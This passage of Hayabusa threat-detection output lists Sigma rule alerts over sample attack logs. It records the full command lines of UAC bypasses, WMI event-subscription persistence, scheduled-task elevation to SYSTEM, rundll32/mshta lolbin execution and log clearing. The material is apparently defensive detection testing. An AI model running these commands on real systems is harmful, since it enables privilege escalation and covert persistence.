",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:46:15.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p 
c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:46:20.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:46:20.828 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:54:02.071 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 01:54:07.508 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p 
c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 01:54:12.493 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 01:54:12.821 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x1bbdce : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,Pass the Hash Activity 
2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:28:17.176 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:19.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini : Path: C:\Windows\System32\cmstp.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:22.598 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,CMSTP Execution Registry 
Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:57:49.903 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:22.809 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.215 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.340 +09:00,IEWIN7,20,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.418 +09:00,IEWIN7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.450 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.590 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:39.746 +09:00,IEWIN7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:50.090 +09:00,IEWIN7,1,informational,Process Creation,Command: 
c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.887 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.903 +09:00,IEWIN7,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.981 +09:00,IEWIN7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:55.028 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:55.090 +09:00,IEWIN7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:55.153 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 03:10:42.434 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx -2019-05-12 03:10:42.668 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : 
Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx -2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx -2019-05-12 09:32:24.461 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:30.211 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 
-2019-05-12 09:32:35.258 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:35.352 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:40.342 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 22:30:32.931 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:30:46.400 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url : Path: C:\Windows\System32\rundll32.exe : 
User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:30:46.556 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:32:58.167 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:37.078 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:59.743 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.523 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" : Path: 
C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:01.383 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:55:56.626 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx -2019-05-12 22:56:12.652 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx -2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx -2019-05-12 22:58:39.850 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx -2019-05-12 22:58:54.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx -2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx -2019-05-12 23:18:03.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: 
